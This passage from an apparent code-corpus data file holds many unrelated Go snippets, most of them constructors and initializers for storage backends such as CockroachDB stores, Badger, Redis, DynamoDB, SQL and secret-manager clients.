a\n\t\t\t\t// range which has processed a raft command to remove itself (which is\n\t\t\t\t// possible prior to 19.2 or if the DisableEagerReplicaRemoval is\n\t\t\t\t// enabled) and has not yet been removed by the replica gc queue.\n\t\t\t\t// We treat both cases the same way. These should no longer exist in\n\t\t\t\t// 20.2 or after as there was a migration in 20.1 to remove them and\n\t\t\t\t// no pre-emptive snapshot should have been sent since 19.2 was\n\t\t\t\t// finalized.\n\t\t\t\treturn errors.AssertionFailedf(\n\t\t\t\t\t\"found RangeDescriptor for range %d at generation %d which does not\"+\n\t\t\t\t\t\t\" contain this store %d\",\n\t\t\t\t\tlog.Safe(desc.RangeID),\n\t\t\t\t\tlog.Safe(desc.Generation),\n\t\t\t\t\tlog.Safe(s.StoreID()))\n\t\t\t}\n\n\t\t\trep, err := newReplica(ctx, &desc, s, replicaDesc.ReplicaID)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// We can't lock s.mu across NewReplica due to the lock ordering\n\t\t\t// constraint (*Replica).raftMu < (*Store).mu. See the comment on\n\t\t\t// (Store).mu.\n\t\t\ts.mu.Lock()\n\t\t\terr = s.addReplicaInternalLocked(rep)\n\t\t\ts.mu.Unlock()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Add this range and its stats to our counter.\n\t\t\ts.metrics.ReplicaCount.Inc(1)\n\t\t\tif tenantID, ok := rep.TenantID(); ok {\n\t\t\t\ts.metrics.addMVCCStats(ctx, tenantID, rep.GetMVCCStats())\n\t\t\t} else {\n\t\t\t\treturn errors.AssertionFailedf(\"found newly constructed replica\"+\n\t\t\t\t\t\" for range %d at generation %d with an invalid tenant ID in store %d\",\n\t\t\t\t\tlog.Safe(desc.RangeID),\n\t\t\t\t\tlog.Safe(desc.Generation),\n\t\t\t\t\tlog.Safe(s.StoreID()))\n\t\t\t}\n\n\t\t\tif _, ok := desc.GetReplicaDescriptor(s.StoreID()); !ok {\n\t\t\t\t// We are no longer a member of the range, but we didn't GC the replica\n\t\t\t\t// before shutting down. Add the replica to the GC queue.\n\t\t\t\ts.replicaGCQueue.AddAsync(ctx, rep, replicaGCPriorityRemoved)\n\t\t\t}\n\n\t\t\t// Note that we do not create raft groups at this time; they will be created\n\t\t\t// on-demand the first time they are needed. This helps reduce the amount of\n\t\t\t// election-related traffic in a cold start.\n\t\t\t// Raft initialization occurs when we propose a command on this range or\n\t\t\t// receive a raft message addressed to it.\n\t\t\t// TODO(bdarnell): Also initialize raft groups when read leases are needed.\n\t\t\t// TODO(bdarnell): Scan all ranges at startup for unapplied log entries\n\t\t\t// and initialize those groups.\n\t\t\treturn nil\n\t\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Start Raft processing goroutines.\n\ts.cfg.Transport.Listen(s.StoreID(), s)\n\ts.processRaft(ctx)\n\n\t// Register a callback to unquiesce any ranges with replicas on a\n\t// node transitioning from non-live to live.\n\tif s.cfg.NodeLiveness != nil {\n\t\ts.cfg.NodeLiveness.RegisterCallback(s.nodeIsLiveCallback)\n\t}\n\n\t// Gossip is only ever nil while bootstrapping a cluster and\n\t// in unittests.\n\tif s.cfg.Gossip != nil {\n\t\t// Register update channel for any changes to the system config.\n\t\t// This may trigger splits along structured boundaries,\n\t\t// and update max range bytes.\n\t\tgossipUpdateC := s.cfg.Gossip.RegisterSystemConfigChannel()\n\t\t_ = s.stopper.RunAsyncTask(ctx, \"syscfg-listener\", func(context.Context) {\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase <-gossipUpdateC:\n\t\t\t\t\tcfg := s.cfg.Gossip.GetSystemConfig()\n\t\t\t\t\ts.systemGossipUpdate(cfg)\n\t\t\t\tcase <-s.stopper.ShouldQuiesce():\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t})\n\n\t\t// Start a single goroutine in charge of periodically gossiping the\n\t\t// sentinel and first range metadata if we have a first range.\n\t\t// This may wake up ranges and requires everything to be set up and\n\t\t// running.\n\t\ts.startGossip()\n\n\t\t// Start the scanner. The construction here makes sure that the scanner\n\t\t// only starts after Gossip has connected, and that it does not block Start\n\t\t// from returning (as doing so might prevent Gossip from ever connecting).\n\t\t_ = s.stopper.RunAsyncTask(ctx, \"scanner\", func(context.Context) {\n\t\t\tselect {\n\t\t\tcase <-s.cfg.Gossip.Connected:\n\t\t\t\ts.scanner.Start(s.stopper)\n\t\t\tcase <-s.stopper.ShouldQuiesce():\n\t\t\t\treturn\n\t\t\t}\n\t\t})\n\t}\n\n\tif !s.cfg.TestingKnobs.DisableAutomaticLeaseRenewal {\n\t\ts.startLeaseRenewer(ctx)\n\t}\n\n\t// Connect rangefeeds to closed timestamp updates.\n\ts.startClosedTimestampRangefeedSubscriber(ctx)\n\ts.startRangefeedUpdater(ctx)\n\n\tif s.replicateQueue != nil {\n\t\ts.storeRebalancer = NewStoreRebalancer(\n\t\t\ts.cfg.AmbientCtx, s.cfg.Settings, s.replicateQueue, s.replRankings)\n\t\ts.storeRebalancer.Start(ctx, s.stopper)\n\t}\n\n\ts.consistencyLimiter = quotapool.NewRateLimiter(\n\t\t\"ConsistencyQueue\",\n\t\tquotapool.Limit(consistencyCheckRate.Get(&s.ClusterSettings().SV)),\n\t\tconsistencyCheckRate.Get(&s.ClusterSettings().SV)*consistencyCheckRateBurstFactor,\n\t\tquotapool.WithMinimumWait(consistencyCheckRateMinWait))\n\n\tconsistencyCheckRate.SetOnChange(&s.ClusterSettings().SV, func() {\n\t\trate := consistencyCheckRate.Get(&s.ClusterSettings().SV)\n\t\ts.consistencyLimiter.UpdateLimit(quotapool.Limit(rate), rate*consistencyCheckRateBurstFactor)\n\t})\n\n\t// Storing suggested compactions in the store itself was deprecated with\n\t// the removal of the Compactor in 21.1. See discussion in\n\t// https://github.com/cockroachdb/cockroach/pull/55893\n\t//\n\t// TODO(bilal): Remove this code in versions after 21.1.\n\terr = s.engine.MVCCIterate(\n\t\tkeys.StoreSuggestedCompactionKeyPrefix(),\n\t\tkeys.StoreSuggestedCompactionKeyPrefix().PrefixEnd(),\n\t\tstorage.MVCCKeyIterKind,\n\t\tfunc(res storage.MVCCKeyValue) error {\n\t\t\treturn s.engine.ClearUnversioned(res.Key.Key)\n\t\t})\n\tif err != nil {\n\t\tlog.Warningf(ctx, \"error when clearing compactor keys: %s\", err)\n\t}\n\n\t// Set the started flag (for unittests).\n\tatomic.StoreInt32(&s.started, 1)\n\n\treturn nil\n}", "func initStore(ctx context.Context, opts *Opts) (*sqlx.DB, vulnstore.Store, error) {\n\t// we are going to use pgx for more control over connection pool and\n\t// and a cleaner api around bulk inserts\n\tcfg, err := pgxpool.ParseConfig(opts.ConnString)\n\tif err != nil {\n\t\treturn nil, nil, fmt.Errorf(\"failed to parse ConnString: %v\", err)\n\t}\n\t// set conn pool size via libvuln.Opts\n\tcfg.MaxConns = opts.MaxConnPool\n\tpool, err := pgxpool.ConnectConfig(ctx, cfg)\n\tif err != nil {\n\t\treturn nil, nil, fmt.Errorf(\"failed to create ConnPool: %v\", err)\n\t}\n\n\tdb, err := sqlx.Open(\"pgx\", opts.ConnString)\n\tif err != nil {\n\t\treturn nil, nil, fmt.Errorf(\"failed to Open db: %v\", err)\n\t}\n\n\t// do migrations if requested\n\tif opts.Migrations {\n\t\tmigrator := migrate.NewPostgresMigrator(db.DB)\n\t\tmigrator.Table = migrations.MigrationTable\n\t\terr := migrator.Exec(migrate.Up, migrations.Migrations...)\n\t\tif err != nil {\n\t\t\treturn nil, nil, fmt.Errorf(\"failed to perform migrations: %w\", err)\n\t\t}\n\t}\n\n\tstore := postgres.NewVulnStore(db, pool)\n\treturn db, store, nil\n}", "func NewStore(init StoreInit) (s *Store, err error) {\r\n\tvar initialCapacity int\r\n\tif utils.IsSet(init.InitCapacity) {\r\n\t\tinitialCapacity = init.InitCapacity\r\n\t} else {\r\n\t\tinitialCapacity = len(init.Args)\r\n\t}\r\n\r\n\tlocalStore := Store{\r\n\t\tstore: make(map[string]string, initialCapacity),\r\n\t\tparent: init.Parent,\r\n\t}\r\n\r\n\tfor _, arg := range init.Args {\r\n\t\tkey, value, err := splitArgument(arg)\r\n\t\tif err != nil {\r\n\t\t\treturn nil, err\r\n\t\t}\r\n\r\n\t\tif value, err = encode.ConvertStringToUtf8(value); err != nil {\r\n\t\t\treturn nil, fmt.Errorf(\"Error converting value for key '%v' to UTF-8: %v\", key, err)\r\n\t\t}\r\n\r\n\t\tif !localStore.hasKey(key) {\r\n\t\t\tlocalStore.Set(key, value)\r\n\t\t} else {\r\n\t\t\treturn nil, fmt.Errorf(\"Duplicate key '%v' found\", key)\r\n\t\t}\r\n\t}\r\n\r\n\treturn &localStore, nil\r\n}", "func New(dir string) *Store {\n\treturn NewWithDB(\"\", badger.New(dir))\n}", "func Init(db *badger.DB) *Store {\n\treturn &Store{db: db}\n}", "func (rs *redisStore)InitStore(sc storeConfig) error{\n\n\tvar addr, password string\n\tvar poolsize, dbnum int\n\n\tconfigs := strings.Split(sc.extraConfig, \",\")\n\tif len(configs) > 0 {\n\t\taddr = configs[0]\n\t}\n\tif len(configs) > 1 {\n\t\tpoolsize, err := strconv.Atoi(configs[1])\n\t\tif err != nil || poolsize < 0 {\n\t\t\tpoolsize = MaxPoolSize\n\t\t}\n\t} else {\n\t\tpoolsize = MaxPoolSize\n\t}\n\tif len(configs) > 2 {\n\t\tpassword = configs[2]\n\t}\n\tif len(configs) > 3 {\n\t\tdbnum, err := strconv.Atoi(configs[3])\n\t\tif err != nil || dbnum < 0 {\n\t\t\tdbnum = 0\n\t\t}\n\t} else {\n\t\tdbnum = 0\n\t}\n\n\tpool := &redis.Pool{\n\t\tMaxIdle:poolsize,\n\t\tDial:func() (redis.Conn, error) {\n\t\t\tc, err := redis.Dial(\"tcp\", addr)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tif password != \"\" {\n\t\t\t\tif _, err = c.Do(\"AUTH\", password); err != nil {\n\t\t\t\t\tc.Close()\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\t\t\t}\n\t\t\t_, err = c.Do(\"SELECT\", dbnum)\n\t\t\tif err != nil {\n\t\t\t\tc.Close()\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\treturn c, err\n\t\t},\n\t}\n\trs.p = pool\n\trs.expire = sc.expire\n\treturn rs.p.Get().Err()\n}", "func (a *SecretAnalyzer) Init(opt analyzer.AnalyzerOptions) error {\n\tif opt.SecretScannerOption.ConfigPath == a.configPath && !lo.IsEmpty(a.scanner) {\n\t\t// This check is for tools importing Trivy and customize analyzers\n\t\t// Never reach here in Trivy OSS\n\t\treturn nil\n\t}\n\tconfigPath := opt.SecretScannerOption.ConfigPath\n\tc, err := secret.ParseConfig(configPath)\n\tif err != nil {\n\t\treturn xerrors.Errorf(\"secret config error: %w\", err)\n\t}\n\ta.scanner = secret.NewScanner(c)\n\ta.configPath = configPath\n\treturn nil\n}", "func New(options Options) *Store {\n\tif options.Codec == nil {\n\t\toptions.Codec = DefaultOptions.Codec\n\t}\n\n\tif options.Interval == 0 {\n\t\toptions.Interval = DefaultOptions.Interval\n\t}\n\n\tif options.TableName == \"\" {\n\t\toptions.TableName = DefaultOptions.TableName\n\t}\n\n\tsql := newSqlSvr(options.User, options.Pwd, options.Host, options.Db, options.TableName, options.Split)\n\tif sql == nil {\n\t\treturn nil\n\t}\n\n\ts := &Store{\n\t\tSql: sql,\n\t\tCodec: options.Codec,\n\t}\n\n\t//go s.autoGC(options.Interval)\n\n\treturn s\n}", "func (s *Store) Init(ctx context.Context, metadataRaw secretstores.Metadata) error {\n\tmetadata, err := s.parseSecretManagerMetadata(metadataRaw)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclient, err := s.getClient(ctx, metadata)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to setup secretmanager client: %s\", err)\n\t}\n\n\ts.client = client\n\ts.ProjectID = metadata.ProjectID\n\n\treturn nil\n}", "func init() {\n\trootCmd.AddCommand(storeTool)\n\tstoreTool.PersistentFlags().StringVarP(&bundle, \"target\", \"t\", \"\", \"Target bundle for tracking\")\n\tstoreTool.MarkFlagRequired(\"target\")\n\tstoreTool.PersistentFlags().StringVarP(&locale, \"locale\", \"l\", \"ru_RU\", \"Locale for tracking\")\n\tstoreTool.PersistentFlags().IntVarP(&period, \"period\", \"p\", 30, \"Period of tracking\")\n\tstoreTool.PersistentFlags().DurationVarP(&intensity, \"intensity\", \"i\", time.Hour*24, \"tracking frequency\")\n\tstoreTool.PersistentFlags().IntVarP(&itemsCount, \"count\", \"c\", 200, \"set count of apps for tracking\")\n\tstoreTool.PersistentFlags().StringVarP(&keywords, \"keywords\", \"k\", \"\", \"keywords for tracking separated by commas\")\n\tstoreTool.PersistentFlags().StringVarP(&keyFile, \"file\", \"f\", \"\", \"file with keywords separated by '\\n'\")\n\tstoreTool.PersistentFlags().BoolVar(&force, \"force\", false, \"force a new tracking instance\")\n\tstoreTool.PersistentFlags().BoolVar(&onlyMeta, \"meta\", false, \"track only meta information\")\n\tstoreTool.PersistentFlags().BoolVar(&skipCategories, \"skip-cat\", false, \"skip parsing categories\")\n\tstoreTool.PersistentFlags().BoolVar(&imgProcessing, \"img\", false, \"save images to local server collection\")\n}", "func (engine *Engine) InitStore() {\n\tengine.storeIndexDocChans = make(\n\t\t[]chan storeIndexDocReq, engine.initOptions.StoreShards)\n\n\tfor shard := 0; shard < engine.initOptions.StoreShards; shard++ {\n\t\tengine.storeIndexDocChans[shard] = make(\n\t\t\tchan storeIndexDocReq)\n\t}\n\tengine.storeInitChan = make(\n\t\tchan bool, engine.initOptions.StoreShards)\n}", "func NewStore(schema Schema, options ...CeousOption) *BaseStore {\n\tstore := &BaseStore{\n\t\tschema: schema,\n\t}\n\tfor _, option := range options {\n\t\toption(store)\n\t}\n\tif !store.disableCache {\n\t\tstore.runner = store._runner\n\t} else {\n\t\tstore.runner = sq.NewStmtCacher(store._runner)\n\t}\n\treturn store\n}", "func New(tableName string, opts ...Option) (*Store, error) {\n\tstore := &Store{\n\t\tregion: DefaultRegion,\n\t\ttableName: tableName,\n\t\thashKey: HashKey,\n\t\trangeKey: RangeKey,\n\t\teventsPerItem: 100,\n\t}\n\n\tfor _, opt := range opts {\n\t\topt(store)\n\t}\n\n\tif store.api == nil {\n\t\tcfg := &aws.Config{Region: aws.String(store.region)}\n\t\ts, err := session.NewSession(cfg)\n\t\tif err != nil {\n\t\t\tif v, ok := err.(awserr.Error); ok {\n\t\t\t\treturn nil, errors.Wrapf(err, \"Unable to create AWS Session - %v [%v]\", v.Message(), v.Code())\n\t\t\t}\n\t\t\treturn nil, err\n\t\t}\n\t\tstore.api = dynamodb.New(s)\n\t}\n\n\treturn store, nil\n}", "func NewScanner(r io.Reader, opts ...Option) *Scanner {\n\ts := &Scanner{\n\t\tr: bufio.NewReader(r),\n\t\tpos: NewPosition(),\n\t}\n\tfor _, opt := range opts {\n\t\topt(s)\n\t}\n\treturn s\n}", "func init() {\n flag.Parse()\n configFile := filepath.Join(*ConfigDirectory, \"store.json\")\n if _, err := os.Stat(configFile); err == nil {\n config, err := ioutil.ReadFile(configFile)\n if err != nil {\n log.Printf(\"ERROR: Error opening store config: %s\", err)\n return\n }\n err = json.Unmarshal(config, StoreConfig)\n if err != nil {\n log.Printf(\"ERROR: Error parsing store config: %s\", err)\n return\n }\n } else {\n log.Printf(\"WARNING: Could not find configuration file store.json in %s\", *ConfigDirectory)\n }\n RegisterRobot(\"/store\", func() (robot Robot) { return new(StoreBot) })\n}", "func InitStore(s KVStore) {\n\tdbConn = s\n\tscheduleCleanup(s)\n}", "func initStore(logger *logging.Logger, connectionString string) *db.Store {\n\tlogger.Debug(\"Initializing Store\")\n\t// establish a store and connection to the db\n\tstore, err := db.NewStore(connectionString)\n\tif err != nil {\n\t\tsentry.CaptureException(err)\n\t\tlogger.Fatal(\"Failed to initialize store:\" + err.Error())\n\t}\n\tlogger.Debug(\"Store established with database connection\")\n\treturn store\n}", "func New(ctx context.Context, alias, path string) (*Store, error) {\n\tdebug.Log(\"Instantiating %q at %q\", alias, path)\n\n\ts := &Store{\n\t\talias: alias,\n\t\tpath: path,\n\t}\n\n\t// init storage and rcs backend\n\tif err := s.initStorageBackend(ctx); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to init storage backend: %w\", err)\n\t}\n\n\tdebug.Log(\"Storage for %s => %s initialized as %v\", alias, path, s.storage)\n\n\t// init crypto backend\n\tif err := s.initCryptoBackend(ctx); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to init crypto backend: %w\", err)\n\t}\n\n\tdebug.Log(\"Crypto for %s => %s initialized as %v\", alias, path, s.crypto)\n\n\treturn s, nil\n}", "func newStore(c *Config) (*Store, error) {\n\tif c == nil {\n\t\tc = defaultConfig()\n\t}\n\tmutex := &sync.RWMutex{}\n\tstore := new(Store)\n\tstartTime := time.Now().UTC()\n\tfileWatcher, err := newWatcher(\".\")\n\tif err != nil {\n\t\tlog.Info(fmt.Sprintf(\"unable to init file watcher: %v\", err))\n\t}\n\tif c.Monitoring {\n\t\tmonitoring.Init()\n\t}\n\tstore.fileWatcher = fileWatcher\n\tstore.store = makeStorage(\"\")\n\tstore.keys = []string{}\n\tstore.compression = c.Compression\n\tstore.dbs = make(map[string]*DB)\n\tstore.lock = mutex\n\tstore.stat = new(stats.Statistics)\n\tstore.stat.Start = startTime\n\tstore.indexes = make(map[string]*index)\n\tc.setMissedValues()\n\tstore.config = c\n\tif c.LoadPath != \"\" {\n\t\terrLoad := loadData(store, c.LoadPath)\n\t\tif errLoad != nil {\n\t\t\treturn nil, fmt.Errorf(\"unable to load data: %v\", errLoad)\n\t\t}\n\t}\n\tstore.writer, err = newWriter(c.LoadPath)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unable to create writer: %v\", err)\n\t}\n\treturn store, nil\n}", "func NewStore() *Store {\n\tvar st Store\n\tst.Records = make(map[string]HostSet)\n\tst.Netviews = make(map[string]string)\n\tst.Cidrs = make(map[string]string)\n\treturn &st\n}", "func New(opts ...Opt) (*Store, error) {\n\tbadgerOptions := getBadgerOptions(opts...)\n\n\tdb, err := badger.Open(badgerOptions)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"could not open database: %w\", err)\n\t}\n\n\tstore := &Store{db, newChangelog()}\n\tif err = store.setup(); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn store, nil\n}", "func Init() error {\n\ts, err := newStore()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tcached = s\n\treturn nil\n}", "func New(ctx context.Context, log logger.Logger, db *db.Store, cache *cache.Cache) (*Store, error) { // nolint:gocognit\n\ts := &Store{\n\t\tlog: log,\n\t\tcache: cache,\n\t}\n\n\t// Set configuration\n\ts.setConfig()\n\n\tvar err error\n\n\tswitch s.typeStore {\n\tcase \"postgres\":\n\t\ts.store, err = postgres.New(ctx, db)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\tcase \"mongo\":\n\t\ts.store, err = mongo.New(ctx, db)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\tcase \"redis\":\n\t\ts.store, err = redis.New(ctx, db)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\tcase \"dgraph\":\n\t\ts.store, err = dgraph.New(ctx, db, log)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\tcase \"leveldb\":\n\t\ts.store, err = leveldb.New(ctx, db)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\tcase \"badger\":\n\t\ts.store, err = badger.New(ctx)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\tcase \"ram\":\n\t\tfallthrough\n\tdefault:\n\t\ts.store, err = ram.New(ctx)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tlog.Info(\"init linkStore\", field.Fields{\n\t\t\"db\": s.typeStore,\n\t})\n\n\treturn s, nil\n}", "func init() {\n\tstore = cache.NewMemoryCache()\n}", "func New(client *redis.Client, opts ...Option) *Store {\n\ts := &Store{\n\t\tclient: client,\n\t\tprefix: \"captchas\",\n\t\texpiration: 10 * time.Minute,\n\t}\n\n\tfor _, f := range opts {\n\t\tf(s)\n\t}\n\n\treturn s\n}", "func New(ctx context.Context, alias, path string, cfgdir string) (*Store, error) {\n\tpath = fsutil.CleanPath(path)\n\ts := &Store{\n\t\talias: alias,\n\t\tpath: path,\n\t\tsync: gitmock.New(),\n\t}\n\n\t// init store backend\n\tswitch backend.GetStoreBackend(ctx) {\n\tcase backend.FS:\n\t\ts.store = fs.New(path)\n\t\tout.Debug(ctx, \"Using Store Backend: fs\")\n\tcase backend.KVMock:\n\t\ts.store = kvmock.New()\n\t\tout.Debug(ctx, \"Using Store Backend: kvmock\")\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"Unknown store backend\")\n\t}\n\n\t// init sync backend\n\tswitch backend.GetSyncBackend(ctx) {\n\tcase backend.GoGit:\n\t\tout.Cyan(ctx, \"WARNING: Using experimental sync backend 'go-git'\")\n\t\tgit, err := gogit.Open(path)\n\t\tif err != nil {\n\t\t\tout.Debug(ctx, \"Failed to initialize sync backend 'gogit': %s\", err)\n\t\t} else {\n\t\t\ts.sync = git\n\t\t\tout.Debug(ctx, \"Using Sync Backend: go-git\")\n\t\t}\n\tcase backend.GitCLI:\n\t\tgpgBin, _ := gpgcli.Binary(ctx, \"\")\n\t\tgit, err := gitcli.Open(path, gpgBin)\n\t\tif err != nil {\n\t\t\tout.Debug(ctx, \"Failed to initialize sync backend 'git': %s\", err)\n\t\t} else {\n\t\t\ts.sync = git\n\t\t\tout.Debug(ctx, \"Using Sync Backend: git-cli\")\n\t\t}\n\tcase backend.GitMock:\n\t\t// no-op\n\t\tout.Debug(ctx, \"Using Sync Backend: git-mock\")\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"Unknown Sync Backend\")\n\t}\n\n\t// init crypto backend\n\tswitch backend.GetCryptoBackend(ctx) {\n\tcase backend.GPGCLI:\n\t\tgpg, err := gpgcli.New(ctx, gpgcli.Config{\n\t\t\tUmask: fsutil.Umask(),\n\t\t\tArgs: gpgcli.GPGOpts(),\n\t\t})\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ts.crypto = gpg\n\t\tout.Debug(ctx, \"Using Crypto Backend: gpg-cli\")\n\tcase backend.XC:\n\t\t//out.Red(ctx, \"WARNING: Using highly experimental crypto backend!\")\n\t\tcrypto, err := xc.New(cfgdir, client.New(cfgdir))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ts.crypto = crypto\n\t\tout.Debug(ctx, \"Using Crypto Backend: xc\")\n\tcase backend.GPGMock:\n\t\t//out.Red(ctx, \"WARNING: Using no-op crypto backend (NO ENCRYPTION)!\")\n\t\ts.crypto = gpgmock.New()\n\t\tout.Debug(ctx, \"Using Crypto Backend: gpg-mock\")\n\tcase backend.OpenPGP:\n\t\tcrypto, err := openpgp.New(ctx)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ts.crypto = crypto\n\t\tout.Debug(ctx, \"Using Crypto Backend: openpgp\")\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"no valid crypto backend selected\")\n\t}\n\n\treturn s, nil\n}", "func New(cfg *Config) secrets.Store {\n\tconfig := Config{}\n\tif cfg != nil {\n\t\tconfig = *cfg\n\t}\n\tif strings.Contains(config.Prefix, \":\") {\n\t\tpanic(\"forbidden character ':' in Prefix\")\n\t}\n\tif config.SecretLen == 0 {\n\t\tconfig.SecretLen = 32\n\t}\n\tif config.Entropy == nil {\n\t\tconfig.Entropy = rand.Reader\n\t}\n\treturn &storeImpl{config}\n}", "func InitRedisStore(conf *viper.Viper) {\n\tpool := &redis.Pool{\n\t\tMaxIdle: 10,\n\t\tDial: func() (redis.Conn, error) {\n\t\t\treturn redis.Dial(\n\t\t\t\t\"tcp\",\n\t\t\t\tconf.GetString(\"redis.address\"),\n\t\t\t\tredis.DialPassword(conf.GetString(\"redis.password\")),\n\t\t\t)\n\t\t},\n\t}\n\tredisStore = &RedisStore{pool}\n}", "func (a *App) initStore(host, port string) {}", "func New() base.Store {\n\tvar s store\n\ts.data = make(map[string]entry)\n\treturn &s\n}", "func NewStore(opts ...store.Option) store.Store {\n\toptions := store.Options{\n\t\tDatabase: defaultDatabase,\n\t\tTable: defaultTable,\n\t}\n\n\tfor _, o := range opts {\n\t\to(&options)\n\t}\n\n\t// new store\n\ts := new(sqlStore)\n\ts.options = options\n\ts.databases = make(map[string]DB)\n\ts.re = regexp.MustCompile(\"[^a-zA-Z0-9]+\")\n\n\tgo s.expiryLoop()\n\t// return store\n\treturn s\n}", "func (s *fsStore) Init(kinds []string) error {\n\tfor _, k := range kinds {\n\t\ts.kinds[k] = true\n\t}\n\ts.checkAndUpdate()\n\tgo func() {\n\t\ttick := time.NewTicker(s.checkDuration)\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-s.donec:\n\t\t\t\ttick.Stop()\n\t\t\t\treturn\n\t\t\tcase <-tick.C:\n\t\t\t\ts.checkAndUpdate()\n\t\t\t}\n\t\t}\n\t}()\n\treturn nil\n}", "func New(_ string) (s *Store, err error) {\n\treturn &Store{xz.NewMap()}, nil\n}", "func BenchmarkStoreScan(b *testing.B, builder Builder) {\n\tfor size := 1; size <= 10000; size *= 10 {\n\t\tb.Run(stringutil.Sprintf(\"%.05d\", size), func(b *testing.B) {\n\t\t\tst, cleanup := storeBuilder(b, builder)\n\t\t\tdefer cleanup()\n\n\t\t\tv := bytes.Repeat([]byte(\"v\"), 512)\n\n\t\t\tfor i := 0; i < size; i++ {\n\t\t\t\tk := []byte(stringutil.Sprintf(\"k%d\", i))\n\t\t\t\terr := st.Put(k, v)\n\t\t\t\tassert.NoError(b, err)\n\t\t\t}\n\n\t\t\tb.ResetTimer()\n\t\t\tfor i := 0; i < b.N; i++ {\n\t\t\t\tit := st.Iterator(engine.IteratorOptions{})\n\t\t\t\tfor it.Seek(nil); it.Valid(); it.Next() {\n\t\t\t\t}\n\t\t\t\tif err := it.Err(); err != nil {\n\t\t\t\t\tassert.NoError(b, err)\n\t\t\t\t}\n\t\t\t\tif err := it.Close(); err != nil {\n\t\t\t\t\tassert.NoError(b, err)\n\t\t\t\t}\n\t\t\t}\n\t\t\tb.StopTimer()\n\t\t})\n\t}\n}", "func Init(endpoint, region, secretKeySecretPath, accessKeySecretPath string, tlsEnabled bool) (faasflow.DataStore, error) {\n\tminioDataStore := &MinioDataStore{}\n\n\tminioDataStore.region = region\n\n\tminioClient, connectErr := connectToMinio(endpoint, secretKeySecretPath, accessKeySecretPath, tlsEnabled)\n\tif connectErr != nil {\n\t\treturn nil, fmt.Errorf(\"Failed to initialize minio, error %s\", connectErr.Error())\n\t}\n\tminioDataStore.minioClient = minioClient\n\n\treturn minioDataStore, nil\n}", "func NewScanner(scannerOptions ScannerOption, opts ...Option) Scanner {\n\thttpClient := &http.Client{\n\t\tTransport: &http.Transport{\n\t\t\tProxy: http.ProxyFromEnvironment,\n\t\t\tTLSClientConfig: &tls.Config{\n\t\t\t\tInsecureSkipVerify: scannerOptions.Insecure,\n\t\t\t},\n\t\t},\n\t}\n\n\tc := rpc.NewScannerProtobufClient(scannerOptions.RemoteURL, httpClient)\n\n\to := &options{rpcClient: c}\n\tfor _, opt := range opts {\n\t\topt(o)\n\t}\n\n\treturn Scanner{\n\t\tcustomHeaders: scannerOptions.CustomHeaders,\n\t\tclient: o.rpcClient,\n\t}\n}", "func InitStore() {\n\tdb, err := storm.Open(config.DatabaseFile)\n\tif err != nil {\n\t\tpanic(xerrors.Errorf(\"Cannot open database: %w\", err))\n\t}\n\tAuth = newAuthStore(db)\n\tComments = newCommentsStore(db)\n\tReviews = newReviewsStore(db)\n}", "func New(client SecretsManagerAPI, options ...option) sidecred.SecretStore {\n\ts := &store{\n\t\tclient: client,\n\t\tsecretTemplate: \"/{{ .Namespace }}/{{ .Name }}\",\n\t}\n\tfor _, optionFunc := range options {\n\t\toptionFunc(s)\n\t}\n\treturn s\n}", "func (si *ScanIterator) Init() {\n\t// Initialization\n}", "func New(opts ...StoreOption) (*Store, error) {\n\tso := storeOptions{}\n\n\tfor _, opt := range opts {\n\t\topt.apply(&so)\n\t}\n\n\tdbOptions := url.Values{}\n\tdbOptions.Set(\"_foreign_keys\", \"true\")\n\n\tdbURL := url.URL{\n\t\tScheme: \"file\",\n\t\tPath: so.path,\n\t\tRawQuery: dbOptions.Encode(),\n\t}\n\n\tdb, err := sqlx.Connect(\"sqlite3\", dbURL.String())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tdb.Mapper = reflectx.NewMapperFunc(\"json\", strings.ToLower)\n\n\treturn &Store{\n\t\tdb: db,\n\t}, nil\n}", "func NewStore() *Store {\n\treturn &Store{\n\t\tls: make(map[string]InitFunc),\n\t}\n}", "func New() *Store {\n\treturn &Store{\n\t\tm: make(map[interface{}]entry),\n\t}\n}", "func newStore(c *Config, httpAddr, raftAddr string) *store {\n\tinternalData := meta.Data{\n\t\tIndex: 1,\n\t}\n\ts := store{\n\t\tdata: &Data{\n\t\t\tData: internalData,\n\t\t},\n\t\tclosing: make(chan struct{}),\n\t\tdataChanged: make(chan struct{}),\n\t\tpath: c.Dir,\n\t\tconfig: c,\n\t\thttpAddr: httpAddr,\n\t\traftAddr: raftAddr,\n\t\tlogger: zap.New(zap.NullEncoder()),\n\t}\n\n\treturn &s\n}", "func (s *Store) Init(sessionID []byte, defaultExpiration time.Duration) {\n\ts.sessionID = 